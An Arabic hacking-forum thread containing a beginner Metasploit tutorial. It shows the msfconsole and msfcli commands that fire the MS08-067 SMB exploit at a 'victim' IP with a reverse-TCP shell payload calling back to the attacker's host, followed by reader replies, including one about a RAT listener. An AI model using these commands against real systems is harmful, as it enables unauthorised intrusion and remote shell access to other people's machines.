:: vBspiders Professional Network ::

:: vBspiders Professional Network :: (http://www.vbspiders.com/vb/index.php)
-   MetaSploit (http://www.vbspiders.com/vb/forumdisplay.php?f=196)
-   -   module 1 : ماهي msfconsole,msfcli,msfweb,msfgui و نبذة عن الأوامر .(METASPLOIT TRANNING) (http://www.vbspiders.com/vb/showthread.php?t=24557)

data$hack 02-03-2010 01:48 AM
module 1 : ماهي msfconsole,msfcli,msfweb,msfgui و نبذة عن الأوامر .(METASPLOIT TRANNING)
 
السلام عليكم ورحمة الله وبركاته
بسم الله الرحمن الرحيم


http://ceh.vn/ceh3/images/tutorial/icon2.png

في هذا الدرس :
ستتعرف msfconsole واوامره , كيفية العمل به
ستتعرف msfcli
ستتعرف msfgui
ستتعرف msfweb


مشروع Metasploit مشروع كبير جدا و مشهور عالميا ، بدايته كانت سنة 2003 , كان يحتوي على القليل من exploits و payloads , فبدأت عملية التطور ليصل اليوم محملا ب 496 exploits و 192 payloads و 239 auxiliary. بالاضافة للعديد من الأدوات التي تساعدنا على اكتشاف ثغرات Buffer overflow ... و الكثير الكثير


سنتحدث اكثر عن msfconsole
تعريف صغير عن البقية

-----------------------
msfconsole
-----------------------
تجدونها على باك تراك هنا :
كود PHP:
pentest/exploits/framework3/msfconsole 

ندخل الان في الاوامر :
اهم امر help
لن اشرحو هههه

امر show :
show exploits
اظهار جميع الثغرات

show payloads
اظهار جميع payload

show auxiliary
اظهار جميع auxiliary

search
للبحث ;مثال :

امر info
تعطينا معلومات ;مثال :

امر use
احنا عندنا ثغرة نريد استخدامها ،
اذا use ;مثال :
كود PHP:
msf > use windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > 
اكتب show options لترى options الثغرة ;مثال :

ماذا يهمنا هنا ???
الظحية rhost
rport البورت المصاب اتركه كما هو
نظع ip الظحية set RHOST ip ;مثال :
كود PHP:
msf exploit(ms08_067_netapi) > set RHOST 192.168.1.2
RHOST => 192.168.1.2 
الان نأتي الى المهم ال payload
باختصار هو كيفية التحكم بجهاز victim
اكتب show payloads من ثم اختر واحدا
باختصار هذه ال payload هي الاقوى :
كود PHP:
windows/shell/reverse_tcp
windows/shell/bind_tcp
windows/vncinject/bind_tcp
windows/meterpreter/reverse_tcp 
سنأتي على تعريفها في الدروس القادمة

نظع ال set payload :::payload ;مثال :
كود PHP:
msf exploit(ms08_067_netapi) > set payload windows/shell/reverse_tcp
payload => windows/shell/reverse_tcp 
اكتب show options لترى options الثغرة again ;مثال :

هههه كبرت
شوف lhost تظع هنا ال ip تبعك ;مثال :
كود PHP:
msf exploit(ms08_067_netapi) > set LHOST 192.168.1.3
LHOST => 192.168.1.3 
كل شيء تمام

الان اكتب exploit للاستغلال ;مثال :

:icon555: :00001793[1]:

تم الاخترق

ملا حظة هامة جدا
انا استعملت ثغرة windows/smb/ms08_067_netapi
يعني انت ممكن تمشي معاك ممكن لا
استعمل ما تعلمته قبل قليل للبحث عن ثغرة تعمل
ان شاء الله استفدتوووا

-----------------------
msfcli
-----------------------

باختصار هيا للاختصار
مثال :
كود PHP:
/pentest/exploits/framework3/msfcli windows/smb/ms08_067_netapi payload=windows/shell/reverse_tcp RHOST=192.168.1.2 LHOST=192.168.1.2 E 
-----------------------
msfgui
-----------------------
للاغبياء فقط :icon666:
تشغيلها سهل :
كود PHP:
pentest/exploits/framework3/msfgui 

-----------------------
msfweb
-----------------------
الاجمل و الاروع :666:
تشغيلها سهل :
كود PHP:
pentest/exploits/framework3/msfweb 
ثم اذهب للمتصفح :
كود PHP:
http://127.0.0.1:55555/ 

ان شاء الله اكون وصلت بعض المعلومات و لو القليل
ان شاء الله بتفهم اكثر مع الدروس القادمة
ارجوا من اصحاب القلوب المريضة حفض الحقوق والله تعبت عليه
best regards
data$hack

marrak 02-03-2010 10:14 PM
بارك الله فيك اخي الكريم
ولي الشرف ان انظم الى دورتك

serial keller 02-03-2010 11:47 PM
[gdwl]thx bro !!!! we waiit for the rest [/gdwl]

data$hack 02-04-2010 01:24 PM
شكرا على المرور

الشبح المرح 02-04-2010 08:57 PM
روووووعة جدا

عندي سؤال و راح اكثر عليك الاسئلة هههههههههه

في ثغرة windows/smb/ms08_067_netapi

ممكن ابدل البورت من 445 الى 81 بيرفوست

و اكون عامل تنصت بالبيرفوست و صيصلني التبيليغ اليس كذالك

ام اني على خطأ

data$hack 02-04-2010 09:27 PM
اهلا بيك اخي الشبح المرح ;;;
لا يمكن تغيير بورت الثغرة اخي لانه البورت الافتراضي للبرنامج
اخي هذه ثغرة buffer لا يمكن تتنصت عليها بال bifrost هي مو سرفر
هذا حد فهمي لسؤالك
اهلا بيك اخي

الشبح المرح 02-04-2010 10:23 PM
ادا لا يوجد الا نت كات

بارك الله فيك على تصحيح الامور

data$hack 02-05-2010 02:39 PM
هذا واجب اخي

Cyber Code 02-08-2010 05:29 PM
مشكور حبيبي واصل وإلا الامام :)

data$hack 02-08-2010 07:38 PM
اقتباس:
المشاركة الأصلية كتبت بواسطة Dark Light (المشاركة 101486)
مشكور حبيبي واصل وإلا الامام :)
منور الموضوع و شكرا على الرد :Great:

kyokar 02-09-2010 11:02 PM
شـكــ وبارك الله فيك ـــرا لك ... لك مني أجمل تحية .

blablabou94 02-11-2010 11:49 PM
شكرا أخي لقد ساعدتني كثيرة على فهمي هذا الموظ3 أنت لمعالم والله
أنتظر الباقي أرجوك

blablabou94 02-12-2010 11:48 PM
سؤال هااام والله هل خطير لو أستعمله ضد حاسوبي أرجوك أنتظر الإجابة//... أي أن حاسوبي هو الضحية

powerful virus 02-27-2010 12:20 PM
بصراحة لي الشرف اني انظم الى دورتك

Governmen7 03-01-2010 11:02 PM
شـكــ وبارك الله فيك ـــرا لك ... لك مني أجمل تحية . موفق بإذن الله ... لك مني أجمل تحية .

samourai_7 04-29-2010 04:30 PM
بارك الله فيك اخوي .... تقبل مروري

mehdisolo 04-30-2010 11:46 PM
mashekor akhi

N-HACK 05-18-2010 07:16 PM
يعطيك الف الف عافية

جهد كبير تستاهل الشكر عليه


منك نستفيد

رغم اننا مبتديئين لكن هناك فرق كبير بعد قراءت موضوعك


نحن الان بصدد جمع معلومات من ثم نبدا بالتعامل مع الاداة واوامرها


خالص الشكر لك اخي الكريم

cisco_security 07-11-2010 02:01 PM
بارك الله فيك اخي الكريم
الله يسترك واصل ابداعاتك بالتوفيق ين شاء الله سلام عليكم

أسدالله الدمشقي 07-12-2010 01:35 PM
ميرسي يا طيب :)

gadoi 08-02-2010 08:39 PM
thanks so much :>)

KALASH3R 08-10-2010 03:02 AM
شكرا أخي

kokii 08-14-2010 10:21 AM
مشكوور اخي الكريم
بارك الله فيك

اسامة.10 09-13-2010 12:29 AM
مشكور اخي على الشرح

tarek26 09-25-2010 12:27 PM
بارك الله فيك اخي الكريم

cisco_security 01-11-2011 07:44 PM
درس في القمة اخي داتا ، شكرا لك و الى الامام مع شورحاتك

زيــزو 03-27-2011 07:33 AM
شكراااااااا

le_camelion_13 09-16-2011 10:27 PM
رد: module 1 : ماهي msfconsole,msfcli,msfweb,msfgui و نبذة عن الأوامر .(METASPLOIT TRANNING)
 
مشكور


الساعة الآن 05:33 AM


[ vBspiders.Com Network ]


SEO by vBSEO 3.6.0